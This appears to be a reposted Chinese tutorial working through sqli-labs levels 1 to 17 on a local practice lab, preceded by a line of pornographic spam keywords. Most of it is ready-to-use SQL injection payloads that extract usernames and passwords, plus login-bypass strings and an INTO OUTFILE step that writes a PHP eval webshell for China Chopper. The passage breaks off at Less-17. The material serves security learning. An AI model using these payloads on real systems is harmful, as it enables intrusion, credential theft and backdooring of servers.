久久精品国产精品国产精品污,男人扒开添女人下部免费视频,一级国产69式性姿势免费视频,夜鲁夜鲁很鲁在线视频 视频,欧美丰满少妇一区二区三区,国产偷国产偷亚洲高清人乐享,中文 在线 日韩 亚洲 欧美,熟妇人妻无乱码中文字幕真矢织江,一区二区三区人妻制服国产

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

1-35关精选篇

發(fā)布時間:2024/6/1 编程问答 49 豆豆
生活随笔 收集整理的這篇文章主要介紹了 1-35关精选篇 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

剛做sqli-lab的時候,我逛了幾個博客論壇沒找到什么特別完整的教程,在這里寫一篇更完整的教程。

本教程中使用到的大部分函數(shù)可以在我的 sql注入入門必備基礎(chǔ)知識中找到具體說明和使用方法。

一些術(shù)語使用錯誤請見諒。

一些題目有多種方法,本人也是在學習當中,我會盡可能補全,但是精力有限,文章不盡完美,請見諒。


?

目錄

Page-1(Basic Challenges)

Less-1 GET - Error based - Single quotes - String(基于錯誤的GET單引號字符型注入)

Less-2 GET - Error based - Intiger based (基于錯誤的GET整型注入)

Less-3 GET - Error based - Single quotes with twist string (基于錯誤的GET單引號變形字符型注入)

Less-4 GET - Error based - Double Quotes - String (基于錯誤的GET雙引號字符型注入)

Less-5 GET - Double Injection - Single Quotes - String (雙注入GET單引號字符型注入)

Less-6 GET - Double Injection - Double Quotes - String (雙注入GET雙引號字符型注入)

Less-7 GET - Dump into outfile - String (導出文件GET字符型注入)

Less-8 GET - Blind - Boolian Based - Single Quotes (布爾型單引號GET盲注)

Less-9 GET - Blind - Time based. - ?Single Quotes ?(基于時間的GET單引號盲注)

Less-10 GET - Blind - Time based - double quotes (基于時間的雙引號盲注)

Less-11 POST - Error Based - Single quotes- String (基于錯誤的POST型單引號字符型注入)

Less-12 POST - Error Based - Double quotes- String-with twist (基于錯誤的雙引號POST型字符型變形的注入)

Less-13 POST - Double Injection - Single quotes- String -twist (POST單引號變形雙注入)

Less-14 POST - Double Injection - Single quotes-??String -twist?(POST單引號變形雙注入)

less-15?POST - Blind- Boolian/time Based - Single quotes (基于bool型/時間延遲單引號POST型盲注)

Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/時間延遲的雙引號POST型盲注)

Less-17 POST - Update Query- Error Based - String (基于錯誤的更新查詢POST注入)

Less-18 POST - Header Injection - Uagent field - Error based (基于錯誤的用戶代理,頭部POST注入)

Less-19 POST - Header Injection - Referer field - Error based (基于頭部的Referer POST報錯注入)

?

Page-2 (Advanced Injections)

Less-20 POST - Cookie injections - Uagent field? - Error based (基于錯誤的cookie頭部POST注入)

Less-21 Cookie Injection- Error Based- complex - string?( 基于錯誤的復雜的字符型Cookie注入)

Less-22 Cookie Injection- Error Based- Double Quotes - string (基于錯誤的雙引號字符型Cookie注入)

Less-23 GET - Error based - strip comments (基于錯誤的,過濾注釋的GET型)

Less - 24 Second Degree Injections??*Real treat* -Store Injections (二次注入)

Less-25 Trick with OR & AND (過濾了or和and)

? ? ? ? ?Less-25a?Trick with OR & AND Blind (過濾了or和and的盲注)

? ? ? ? ? ? ? ? ? ?Less-26(failed) Trick with comments and space (過濾了注釋和空格的注入)

? ? ? ? ? ? ? ? ? ?/*26-28轉(zhuǎn)https://blog.csdn.net/nzjdsds/article/details/77430073#t9*/

? ? ? ? ??less 26 ?Trick with comments and space (過濾了注釋和空格的注入)

? ? ? ? ??less 26a GET - Blind Based - All your SPACES and COMMENTS belong to us(過濾了空格和注釋的盲注)

? ? ? ? ??less 27 GET - Error Based- All your UNION & SELECT belong to us (過濾了union和select的)

? ? ? ? ??less 27a GET - Blind Based- All your UNION & SELECT belong to us

? ? ? ? ? ?less 28 GET - Error Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于錯誤的,有括號的單引號字符型,過濾了union和select等的注入

? ? ? ? ? ??less 28a GET - Bind Based- All your UNION & SELECT belong to us String-Single quote with parenthesis基于盲注的,有括號的單引號字符型,過濾了union和select等的注入

Less-29 基于WAF的一個錯誤

Less-30 Get-Blind Havaing with WAF

Less-31 Protection with WAF

Less-32 Bypass addslashes()

Less-33 Bypass addslashes()

Less-34 Bypass Add SLASHES

Less-35 why care for addslashes()

結(jié)語



Page-1(Basic Challenges)

?

?

Less-1 GET - Error based - Single quotes - String(基于錯誤的GET單引號字符型注入)

  • 方法一:手工UNION聯(lián)合查詢注入

輸入單引號,頁面報錯,如下圖所示

根據(jù)報錯信息,可以確定輸入?yún)?shù)的內(nèi)容被存放到一對單引號中間,

猜想:咱們輸入的1在數(shù)據(jù)庫中出現(xiàn)的位置為:select ... from ... where id=’1’ ......,

也可以查看sqli-lab中l(wèi)ess-1的php文件可以看到,和猜想一致,

多余的步驟不多說了,直接開始爆數(shù)據(jù)吧。

?

注意 id=非正確值

爆庫payload

?id=-1' union select 1,2,database() --+

得到‘security’庫名

爆表payload

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

查到? emails,referers,uagents,users ,顯然users是用戶數(shù)據(jù)表

?

爆列名(字段)payload

?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

爆值payload

?id=0' union select 1,2,group_concat(username,0x3a,password) from users--+

0x3a: 0x是十六進制標志,3a是十進制的58,是ascii中的 ':' ,用以分割pasword和username。

?

方法二:手工報錯型注入

檢測報錯型payload

  • ?id=1' and 1=1--+ //正確
  • ?id=1' and 1=2--+ //失敗
  • 證明確實存在手工報錯型注入,

    注意id=正確值

    ?

    爆表payload

    ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

    爆列名(字段)payload

    ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+

    ?顯然沒有完全顯示

    使用 and column_name not in ('user_id','first_name','last_name','user','avatar','last_login','failed_login') 來顯示其他值:

    ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','first_name','last_name','user','avatar','last_login','failed_login')))) --+

    爆值payload

    ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+

    同樣使用not in顯示其他值

    ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+

    ?

    方法三:sqlmap工具自動注入

    sqlmap最起碼適用于1-10題,其他沒試過,sqlmap的使用有教程,我先不在這里寫了,畢竟這篇主要是理解sql注入的教程。

    以后有空再補充吧。

    注入結(jié)束。

    ?

    Less-2 GET - Error based - Intiger based (基于錯誤的GET整型注入)

    輸入單引號,根據(jù)報錯信息確定咱們輸入的內(nèi)容被原封不動的帶入到數(shù)據(jù)庫中,也可叫做數(shù)字型注入,

    就是,把第一題中id=1后面的單引號去掉,其它保持不變就行了,不再贅述。

    ?

    Less-3 GET - Error based - Single quotes with twist string (基于錯誤的GET單引號變形字符型注入)

    輸入單引號,根據(jù)報錯信息確定咱們輸入的內(nèi)容存放到一對單引號加圓括號中了,猜想一下咱們輸入1在數(shù)據(jù)庫語句中的位置,形如select ... from ... where id=(‘1’) ...,在第一題中id=1‘的后面單引號加上),其它保持不變就行了,不再贅述。

    其實我推薦,做完題去看看它題目的php傳參語句,和過濾語句,對理解sql注入原理很有幫助的。

    ?

    Less-4 GET - Error based - Double Quotes - String (基于錯誤的GET雙引號字符型注入)

    輸入單引號,頁面無任何變化,

    輸入雙引號,頁面報錯,

    根據(jù)報錯信息判斷出咱們輸入的內(nèi)容被放到一隊雙引號和圓括號中,

    猜想一下:select ... from ... where id=(”1”) ...,把第一題中1后面的引號換成雙引號加)就可以了。

    不再贅述。

    ?

    Less-5 GET - Double Injection - Single Quotes - String (雙注入GET單引號字符型注入)

    看到這個報錯信息,第一反應就是布爾型盲注、報錯型注入、時間延遲型盲注了

    下面給出驗證時間延遲型的盲注:

    http://127.0.0.1/sqli-labs-master/Less-5/?id=1' and sleep(5)--+

    發(fā)現(xiàn)明顯延遲,說明猜測正確。接下來的思路是通過延遲,依次爆破數(shù)據(jù)庫長度,數(shù)據(jù)庫名,表名,列名,以及字段。

    布爾型和時間延遲型盲注建議采用sqlmap去跑。

    其實本題不能稱作盲注,因為存在回顯,真正的盲注時不存在回顯的,只能根據(jù)瀏覽器加載頁面情況,判定是否注入成功。

    一些專業(yè)術(shù)語的誤用請見諒。

    方法一:時間延遲型手工注入:

    時間延遲型手工注入,正確會延遲,錯誤沒有延遲。id無所謂,又不看回顯,可以通過瀏覽器的刷新提示觀察延遲情況,但是id正確的時候的回顯有利于觀察。

    時間延遲型報錯型payload核心部分的構(gòu)造相同

    本方法中payload? =? ?id=1' and if(報錯型payload核心部分,sleep(5),1)--+

    爆庫長payload

    ?id=1' and if(length(database())=8,sleep(5),1)--+

    ?

    ?明顯延遲,數(shù)據(jù)庫長度為8.

    爆庫名payload

    ?id=1' and if(left(database(),1)='s',sleep(5),1)--+

    ?

    明顯延遲,數(shù)據(jù)庫第一個字符為s,加下來以此增加left(database(),字符長度)中的字符長度,等號右邊以此爆破下一個字符,正確匹配時會延遲。最終爆破得到left(database(),8)='security'

    爆表名payload

    ?id=1' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+

    通過堅持不懈的測試,終于在limit 3,1 爆破出user表名為users.

    爆列名payload

    ?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+

    首先嘗試定向爆破,以提高手工注入速度,修改limit x,1 中的x查詢password是否存在表中,lucky的是limit 3,1的時候查到了password列,同樣的方法查詢username ,又一個lucky,接下來爆破字段的值。

    爆破值payload

    ?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+ ?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

    ?按照id排序,這樣便于對應。注意limit 從0開始.通過堅持不懈的嘗試終于爆破到第一個用戶的名字dumb,密碼dumb,需要注意的是,mysql對大小寫不敏感,所以你不知道是Dumb 還是dumb。

    還有下面的還幾個用戶沒爆破,重復性的工作,我們技術(shù)人,應該少做,要學會如何在前人的基礎(chǔ)上更近一層,前幾天看了劉慈欣的《鄉(xiāng)村教師》,感觸很深,我們使用聲波文字這樣的載體傳輸信息,每秒傳輸幾個字節(jié),而且我們的存儲體系很弱,這就很大程度阻止我們?nèi)祟愇拿鬟M程的發(fā)展速度的提高。

    所以要在更多的在前人的基礎(chǔ)上創(chuàng)造新的東西。

    這種重復性的工作,不要多做。sql注入,人生苦短,快用sqlmap。

    方法二,布爾型手工注入:

    在布爾型注入中,正確會回顯,錯誤沒有回顯,以此為依據(jù)逐字爆破,注意id=1

    手工注入時可使用例如left((select database()),1)<'t'? 這樣的比較二分查找方法快速爆破。

    暴庫payload

    ?id=1' and left((select database()),1)='s'--+

    ?

    ?

    可以看>'t'無回顯,而<'t'有回顯。

    最終確定的庫名為security。

    爆表paylaod

    ?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+

    修改limit x,1和left中的位數(shù)限定數(shù)字,爆破到第一張表為referer,終于在第三張表爆破到user表,名為users。

    爆列名payload

    ?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' --+

    定向爆破制定password為字段名,最后找到第4個字段為password,同理看看有沒有usrname,最后到找到了,接下來只需要爆破這兩個字段的值就完事了。

    爆字段payload

    ?id=1' and left((select password from users order by id limit 0,1),1)='d' --+

    用戶名

    ?id=1' and left((select username from users order by id limit 0,1),1)='d' --+

    按照id排序,這樣便于對應。注意limit 從0開始.最后爆破到第一個用戶的名字dumb,密碼dumb,需要注意的是,mysql對大小寫不敏感,所以你不知道是Dumb 還是dumb。

    布爾型的盲注比較煩的的就是手工注入很麻煩,必須慢慢試。

    方法三,使用concat聚合函數(shù)

    參考資料:http://www.2cto.com/article/201303/192718.html

    簡單的說,使用聚合函數(shù)進行雙注入查詢時,會在錯誤信息中顯示一部分錯誤信息。

    比如count函數(shù)后面如果使用分組語句就會把查詢的一部分以錯誤的形式顯示出來。

    例如select count(*), concat((select version()), floor(rand()*2))as a from information_schema.tables group by a;
    查詢數(shù)據(jù)庫版本,我在phpmyadmin中測試:

    可以看到測試的錯誤信息中出現(xiàn)了版本號。即構(gòu)造雙查詢,比如派生表,使一個報錯,另一個的結(jié)果就會出現(xiàn)在報錯的信息中。廢話不多說,想了解更詳細的看鏈接的內(nèi)容,下面進入正題。

    payload在concat()中構(gòu)造

    爆庫payload

  • ?id=-1'union select count(*),count(*), concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
  • //或者
  • ?id=-1'union select count(*),1, concat('~',(select database()),'~',floor(rand()*2)) as a from information_schema.tables group by a--+
  • //注意本本方法具有隨機性,原理待研究
  • ?

    爆用戶payload

    ?id=-1' union select count(*),1, concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a--+

    爆表名payload

    ?id=-1' union select count(*),1, concat('~',(select concat(table_name) from information_schema.tables where table_schema=database() limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

    ?修改limit x,1 可以遍歷表名,找到user這個表,猜測它存放username和password

    爆列名payload

    ?id=-1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_name='users' limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

    ??修改limit x,1 可以遍歷列名,找到username和password列

    爆字段payload

    ?id=-1' union select count(*),1, concat('~',(select concat_ws('[',password,username) from users limit 1,1),'~',floor(rand()*2)) as a from information_schema.tables group by a--+

    ?

    修改limit x,1 可以顯示第x個用戶的password和username? (‘[’是分隔符)

    注入結(jié)束。


    Less-6 GET - Double Injection - Double Quotes - String (雙注入GET雙引號字符型注入)

    ?雙引號字符型注入,上一題的單引號改成雙引號就可以了,同樣是兩種方法:時間延遲型的手工盲注、報錯型的手工盲注或者sqlmap,再有利用concat()幾聚合數(shù)。

    步驟和第五題一樣,不再贅述。


    Less-7 GET - Dump into outfile - String (導出文件GET字符型注入)

    幾次嘗試,不難猜出注釋符被過濾了,但是看看題目:less 7?GET - Dump into outfile - String (導出文件GET字符型注入)

    所以大概要使用文件導出。我投機取巧了,找了個簡單題less-2直接注入拿到路徑,方便導出。

    這里插個小擴展:

    winserver的iis默認路徑c:\Inetpub\wwwroot

    linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等

    apache 就.../var/www/htm,.../var/www/html/htdocs

    phpstudy 就是...\PhpStudy20180211\PHPTutorial\WWW\

    xammp 就是...\xampp\htdocs

    payload

    Less-2/?id=-1 union select 1,@@basedir,@@datadir --+

    注入less-7

    payload

    ?id=1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "F:\\WhiteFlie\\PhpStudy20180211\\PHPTutorial\\WWW\\sqli-labs\\ttt.php"--+

    php的一句話我就不多解釋了。

    注意下這里的路徑必須用 \\

    雖然回顯報錯,但是查看本地文件已經(jīng)寫入了ttt.php,接下來中國菜刀(有需要的可以給評論一下,Email給你)連接一下。

    連接之前最好用瀏覽器訪問一下,相當于運行一下,否則可能連不上。

    地址:php一句話木馬的地址,后面的口令就是剛才寫的post里寫的cmd,當然可以使用其他口令。

    本題是導出文件GET字符型注入,實際情況下,如果可掃描出phpmyadmin的后臺,并且后臺使用弱口令,也可以通過爆破進入后臺,從后臺注入文件。

    大致過程:

    再phpmyadmin的sql中執(zhí)行命令:

  • use test; //選擇數(shù)據(jù)庫為test
  • create table test(bbb varchar(64)); //在數(shù)據(jù)庫中創(chuàng)建一個表test
  • insert into test values("<?php @eval($_POST['cmd']);?>"); //在test中插入一條數(shù)據(jù)
  • <?php @eval($_POST['cmd']);?> select * from test into outfile '一句話木馬路徑'; //將test中的數(shù)據(jù)導出到php文件
  • 然后菜刀連接一下。

    再或者直接用sqlmap跑也是可以的,不在贅述。

    注入完成。

    • PS:

    需要說一下這個方法需要mysql數(shù)據(jù)庫開啟secure-file-priv寫文件權(quán)限,否則不能寫入文件。

    這是個坑,這里說一下方法,方便讀者,不需要麻煩的再去找其他博客資料。

    如果你使用的時phpstudy,或者xammp請修改其自己的環(huán)境里的mysql配置文件。

    進入mysql安裝目錄,找到my.ini 修改里面的secure-file-priv參數(shù)

    如果發(fā)現(xiàn)沒有secure_file_priv這個選項,直接再最后添加一個空的即可。

    如果引號中是一個文件路徑的話,導入/出的文件路徑會再這個路徑下。

    這破問題困擾我挺長時間的,現(xiàn)在在這說下,讓以讀者少走彎路。


    Less-8 GET - Blind - Boolian Based - Single Quotes (布爾型單引號GET盲注)

    題目名字暴露一切,本來不想看的,又瞥到了,布爾型盲注,單引號,id=1回顯,價格單引號不回顯,構(gòu)造一下驗證是不是布爾型payload ?id=1' and 1=1 --+ 回顯了,證明沒跑了。

    那就一步一步來吧,和less5一樣的,根據(jù)回顯判斷。

    可以通過 > < 比較字符大小加速爆破

    暴庫payload

    ?id=1' and left((select database()),1)='s'--+

    庫名長度可使用?id=1' and length(database())=8--+ 判斷,同理表名字,段名等。

    最后得到庫名?id=1' and left((select database()),8)='security'--+

    爆表,爆字段,爆值,流水操作,和less5的方法二,手工注入所有payload一摸一樣,不再贅述。

    less5的方法二,時間型的注入一樣能用,

    但是不知道為什么concat聚合函數(shù)這題用不了。

    注入完成。


    Less-9 GET - Blind - Time based. - ?Single Quotes ?(基于時間的GET單引號盲注)

    不管怎么輸入,回顯總是you are ...

    考慮時間型盲注,payload

    ?id=1' and sleep(3) --+

    注意id=1,發(fā)現(xiàn)明顯延遲,說明注入成功,接下來爆破就完了。

    這道題的payload構(gòu)造和第五題的方法一是一樣的,一些廢話就不多說了,這里就列一下過程,完事兒。

    爆庫payload

    ?id=1' and if(length(database())=4 , sleep(3), 1) --+

    發(fā)現(xiàn)當?id=1' and if(length(database())=8 , sleep(3), 1) --+時明顯延遲,所以庫名長為8

    ?id=1' and if(left(database(),1)='s' , sleep(3), 1) --+

    發(fā)現(xiàn)明顯延遲說明庫名第一個字符為 's'

    繼續(xù)爆破?id=1' and if(left(database(),8)='security' , sleep(3), 1) --+

    說明庫名為 'security'

    爆表payload

    ?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' , sleep(3), 1) --+

    使用limit x,1 查詢第x個表名,和爆破庫名一樣,第一個表名為referer。終于,在第三個表爆到users這個表,顯然是用戶信息表。

    爆字段payload

    定向爆破password和username,這里就不解釋了,第五題里面寫的比較詳細了。

    ?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password', sleep(3), 1) --+ ?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 9,1),8)='username', sleep(3), 1) --+

    我在第4,9行分別爆破到password和username,個人環(huán)境不同的可能表位置有差別。

    爆值payload

    ?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' , sleep(3), 1) --+ ?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' , sleep(3), 1) --+

    爆破到第一個人的username:dumb,password:dumb。修改limit x,1 繼續(xù)爆破其他用戶,手工注入比較慢,可以使用sqlmap。

    注入結(jié)束。

    ?

    Less-10 GET - Blind - Time based - double quotes (基于時間的雙引號盲注)

    基于時間的雙引號盲注,只要把上一題Less-9的單引號改成雙引號,一樣的注入,不再贅述。

    ?


    • 11到21關(guān)的提交方式全是post型的,我這里使用火狐瀏覽器的HackBar
    • 實踐證明,只能使用burpsuit抓包軟件,修改post參數(shù),所以棄用hackbar,改用burpsuit。

    界面常用選項介紹

    less11-less20登陸框的題可以輸入帶',",),的賬號密碼,根據(jù)報錯判斷sql查詢語句的構(gòu)造方式:

    ?

    Less-11 POST - Error Based - Single quotes- String (基于錯誤的POST型單引號字符型注入)

    模擬真實環(huán)境,我們作為Dump用戶使用Dump密碼登陸,可以看到以下

    ?

    登陸成功

    此時打開hackbar選中post可以看到,已經(jīng)自動載入的剛才提交的表單數(shù)據(jù):

    我剛測試了一下,hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作為post參數(shù)時,無論and后面是1=1

    還是1=2,都能登陸,不知道為什么,可能是提交的時候自動加了+號連接語句的問題。

    所以現(xiàn)在改用burpsuit,抓包修改參數(shù)。

    • 重新來過

    輸入admin admin 登陸,抓包,發(fā)送到repeater模塊

    在repeater中通過修改post的參數(shù)進行注入。

    ?

    • 方法一 extractvalue測試payload
  • uname=admin' and 1=1 --+ &passwd=admin&submit=Submit //能登陸
  • uname=admin' and 1=2 --+ &passwd=admin&submit=Submit //不能登陸
  • 說明注入生效,存在報錯型注入,接下來又是重復性工作,上extractvalue()

    爆庫payload

    uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

    爆表payload

    uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&passwd=admin&submit=Submit

    只能查詢到前幾個表,后面加上not in ()就可以查到其他表了,如:

    uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name not in ('emails')))) --+&passwd=admin&submit=Submit

    這里我們發(fā)現(xiàn)沒有更多的表了,而users表應該是存放用戶信息的,所以我們進入下一步。

    爆列名payload

    uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit

    使用同樣方法,可以查詢到其他列名,直到遍歷出所有列名,我們找到password和uername,開始爆值。

    爆值payload

    uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&passwd=admin&submit=Submit

    同樣使用not in 可以查詢其他值:

    uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+&passwd=admin&submit=Submit

    • 方法二 聯(lián)合查詢union select測試payload
    uname=0' union select 1,2 --+&passwd=admin&submit=Submit

    注意uname是錯誤的,才能顯示聯(lián)合查詢內(nèi)容。

    可以注入。

    然后就是最基本的union select注入,打個樣:

    爆庫payload

    uname=0' union select 1,database() --+&passwd=admin&submit=Submit

    不再贅述。

    注入結(jié)束。

    ?

    Less-12 POST - Error Based - Double quotes- String-with twist (基于錯誤的雙引號POST型字符型變形的注入)

    雙引號報錯型注入

    按照題意應該是可以使用上一題的payload只需要修改單引號為雙引號,但是實際測試不行,無論我使用--+還是%23還是#都不行,我就看了一下php文件:

    可以看到sql查詢語句:

    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";

    構(gòu)造一個能閉合語句而且會報錯的payload:

    admin"? and extractvalue(1,concat(0x7e,(select database())))? and "?

    最終admin = "admin"? and extractvalue(1,concat(0x7e,(select database())))? and "?"

    傳入后就變成了:

    @$sql="SELECT username, password FROM users WHERE username="admin" and extractvalue(1,concat(0x7e,(select database()))) and " " and password=($passwd) LIMIT 0,1";

    ?

    ?前閉合,中間查詢,后面報錯,應該是這樣沒錯了,實際測試沒問題,可以回顯,接下來就再concat()中構(gòu)造查詢語句:

    ?

    爆庫payload

    uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit

    ?

    爆表payload

    uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and " &passwd=admin&submit=Submit

    爆列payload

    uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and " &passwd=admin&submit=Submit

    同樣使用not in查詢沒有顯示出的其他值。

    爆值payload

    uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users))) and " &passwd=admin&submit=Submit

    ?

    方法二,聯(lián)合注入查詢。

    uname=0") union select 1,database() --+ &passwd=admin&submit=Submit

    和less-11一樣的聯(lián)合查詢,不再贅述。

    ?

    方法三,奇淫技巧

    ?

    ?報錯的內(nèi)容為:

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin") LIMIT 0,1' at line 1

    可以看出,他在我們輸入的哪里多加了一個雙引號和括號。

    據(jù)此構(gòu)造出萬能密碼的Payload:

    賬號:admin")#

    ?

    注入結(jié)束。

    ?

    Less-13 POST - Double Injection - Single quotes- String -twist (POST單引號變形雙注入)

    通過報錯可知? 是通過') 閉合的

    發(fā)現(xiàn)沒有登入成功返回信息 ,看來是要盲注了。

    方法一,報錯型

    既然它返回錯誤信息了,說明有回顯,可以報錯注入。

    樣例payload

    uname=admin') and extractvalue(1,concat(0x7e,(select database()))) and ('

    在concat()中構(gòu)造查詢語句,完事,和less-12以及之前的報錯型注入一樣,不再贅述。

    方法二,時間型盲注

    因為可以報錯注入,這個方法沒有回顯,就有點雞肋了,給個樣例payload:

    uname=admin') and if(left(database(),1)='s',sleep(3),1) --+&passwd=admin&submit=Submit

    這就又和之前的一樣了,不在贅述。

    ?

    Less-14 POST - Double Injection - Single quotes-??String -twist?(POST單引號變形雙注入)

    輸入內(nèi)容被放到雙引號中,報錯型注入,注釋符不可用

    ?

    方法一,報錯型

    樣例payload

    uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit

    ?

    方法二,時間型盲注

    效率低,雞肋

    樣例payload

    uname=admin" and if(left(database(),1)='s',sleep(3),1) --+ &passwd=admin&submit=Submit

    方法三,聚合函數(shù)

    具有隨機性,雞肋

    樣例payload

    uname= " union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd=admin&submit=Submit

    ?

    注入結(jié)束。

    ?

    less-15?POST - Blind- Boolian/time Based - Single quotes (基于bool型/時間延遲單引號POST型盲注)

    盲注 - 基于布爾值 - 字符串

    怎么輸入都沒有回顯,那就時間延遲吧。

    布爾測試payload

  • uname=admin' and 1=1 --+&passwd=admin&submit=Submit //登陸成功
  • uname=admin' and 1=2 --+&passwd=admin&submit=Submit //登錄失敗
  • ?

    時間延遲測試payload

    uname=admin' and sleep(5) --+&passwd=admin&submit=Submit

    明顯延遲,確定使用延遲注入。

    手工延遲注入,最為致命。

    爆庫,表,列名,值,一次給出吧。

  • uname=admin' and if(length(database())=8,sleep(5),1)--+&passwd=admin&submit=Submit
  • uname=admin' and if(left(database(),1)='s',sleep(5),1)--+&passwd=admin&submit=Submit
  • uname=admin' and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(5),1)--+&passwd=admin&submit=Submit
  • uname=admin' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(5),1)--+&passwd=admin&submit=Submit
  • uname=admin' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+&passwd=admin&submit=Submit
  • uname=admin' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+&passwd=admin&submit=Submit
  • ?

    ?

    Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/時間延遲的雙引號POST型盲注)

    這道題不管我在登陸框怎么輸入,都沒有錯誤信息顯示,猜測是延遲型盲注。

    ?

    方法一,時間延遲注入

    payload和less-15差不多,只需要把上一題正的單引號改為雙引號加括號 ") 就完事了。

    不再贅述

    ?

    方法二:奇淫技巧:

    萬能賬號繞過密碼驗證:admin")#

    注入結(jié)束。

    ?

    Less-17 POST - Update Query- Error Based - String (基于錯誤的更新查詢POST注入)

    單引號報錯型, 注釋符可用

    這題也沒有錯誤回顯,差點就盲注去了,但是我去查了一下php文件:

    顯然,這里對uname做了check_input的處理,check_input()函數(shù)如下

    看看是如何處理的

  • function check_input($value)
  • {
  • if(!empty($value))
  • {
  • // truncation (see comments)
  • $value = substr($value,0,15);
  • }
  • // Stripslashes if magic quotes enabled
  • if (get_magic_quotes_gpc())
  • {
  • $value = stripslashes($value);
  • }
  • // Quote if not a number
  • if (!ctype_digit($value))
  • {
  • $value = "'" . mysql_real_escape_string($value) . "'";
  • }
  • else
  • {
  • $value = intval($value);
  • }
  • return $value;
  • }
  • 只截取15個字符

    get_magic_quotes_gpc()

    當magic_quotes_gpc=On的時候,函數(shù)get_magic_quotes_gpc()就會返回1

    當magic_quotes_gpc=Off的時候,函數(shù)get_magic_quotes_gpc()就會返回0

    magic_quotes_gpc函數(shù)在php中的作用是判斷解析用戶提示的數(shù)據(jù),如包括有:post、get、cookie過來的數(shù)據(jù)增加轉(zhuǎn)義字符“\”,以確保這些數(shù)據(jù)不會引起程序,特別是數(shù)據(jù)庫語句因為特殊字符引起的污染而出現(xiàn)致命的錯誤。

    在magic_quotes_gpc = On的情況下,如果輸入的數(shù)據(jù)有

    單引號(’)、雙引號(”)、反斜線(\)與 NULL(NULL 字符)等字符都會被加上反斜線。

    stripslashes()刪除由 addslashes() 函數(shù)添加的反斜杠

    ctype_digit()判斷是不是數(shù)字,是數(shù)字就返回true,否則返回false

    mysql_real_escape_string()轉(zhuǎn)義 SQL 語句中使用的字符串中的特殊字符。

    intval()?????整型轉(zhuǎn)換

    我靠做了這么多花里胡哨的過濾,你怎么沒對password也搞一次?

    ?

    針對password爆破:

    使用updatexml(),它和extractvaule()是親兄弟,以下測試version()返回mysql版本:

    ?

    爆庫payload

    ?

    爆表名payload

    ?

    爆列名payload

    uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and column_name not in ('user_id','user','first_name','last_name','avatar','last_login','failed_login')),0x7e),1) --+ &submit=Submit

    ?

    爆值payload

    使用 :uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+ &submit=Submit

    發(fā)現(xiàn)不行:

    ?

    加一層select試試,

